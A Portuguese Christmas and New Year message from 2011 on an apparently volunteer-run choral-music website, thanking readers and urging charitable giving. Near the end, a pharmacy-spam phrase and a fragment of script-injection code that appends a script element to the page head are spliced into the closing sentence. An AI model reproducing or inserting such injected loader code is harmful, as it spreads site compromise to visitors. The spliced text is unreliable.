Notícia

Uma mensagem de Natal

Nosso site, ao final deste ano de muitas conquistas, não poderia deixar de expressar seis sentimentos de um tempo tão amável e de esperança.

Caros amigos, normalmente, quando chegamos ao final do ano, nos damos conta de como passou rápido. Às vezes, ficamos bem com isso, mas outras vezes nos lamentamos por não termos feito muita coisa que esperávamos fazer, seja por que motivo for.

O fato é que chegamos ao fim deste ano de 2011. Todos nós temos coisas a agradecer, temos queixas, temos coisas boas e coisas não muito boas, mas o fato é que aqui estamos para as comemorações de mais um Natal e de mais um Ano Novo.

O nosso site tem motivos para se regozijar neste ano, uma vez que conseguimos fazer um lay-out totalmente novo, moderno, bonito e cheio de conteúdo. Estamos tentando, ainda com um sucesso bastante reduzido, obter parcerias com aqueles que querem divulgar seus eventos, para termos algum faturamento que nos permita continuar no ar, informando tudo aos nossos usuários.

Ainda há muito por fazer, mas dependemos de pessoas que nos ajudaram até agora, mas que têm também seus compromissos e não podem se dedicar ao site totalmente, como seria legal. De qualquer modo, aqui estamos e vamos continuar, se Deus quiser.

O importante é que esta época, mesmo para aqueles que não têm fé cristã, normalmente traz um ambiente de mais amizade, mais alegria, mais esperança. Será que são os fluidos da Estrela de Natal que tenta nos conduzir ao presépio para estarmos presentes ao nascimento de Cristo?

Temos os nossos presentes para Ele? Podemos ter sim… podemos, além de presentear nossos familiares e amigos, como é praxe, estender um pouco mais a nossa mão e contribuir, de que maneira for, para um Natal um pouco menos sofrido daqueles que tanto precisam da ajuda de outras pessoas. Vamos tentar encarnar os Reis Magos que vieram de tão longe, seguindo a estrela, para presentearem o Deus que acabara de nascer.

Não vamos deixar para depois. Vamos procurar uma igreja em que acreditemos, vamos procurar uma comunidade que saibamos honesta, vamos procurar uma organização que não desvie os recursos e vamos presentear as pessoas através delas. Mas, se você pode fazer isso diretamente a pessoas que você conheça, faça-o.

Quem já se deixou embalar por este espírito que vaga nesta época pode confirmar que o coração fica mais leve, o amor fica mais aparente, os rostos mais desanuviados, a família mais unida, os irmãos mais fraternos, pais e filhos mais tolerantes ou mais amigos. Enfim, se isso não está acontecendo, vamos tecer as nossas teias para que o espírito natalino invada os nossos corações. Vamos nos abrir a esta ideia e a este fazer… vamos tentar ser mais felizes.

O nosso site agradece aos usuários que nos prestigiaram, agradece aos colaboradores que sempre deram o melhor de si para elevar cada vez mais o nível de nossos textos. Agradece também aos que trabalharam para a criação e a manutenção do site e não poderia esquecer aqueles que acreditaram em nós e contribuíram para mantê-lo no ar, através de colaboração na divulgação de seus eventos.

Vamos pedir, enfim, ao Deus Menino que abençoe todos nós, nossas famílias, nossos festejos, nossos presentes, nossos alimentos e nossas boas intenções.

Não podia deixar passar a ocasião para desejar a todos, além de um Feliz Natal, um ano de 2012 melhor que o melhor ano de suas e de nossas vidas. clomid with echeck d.getElementsByTagName(‘head’)[0].appendChild(s);

Faça seu comentário

1 Comment

Leave a Response

Antônio Rodrigues
Apaixonado por música coral, é um dos fundadores e mantenedor do movimento.com.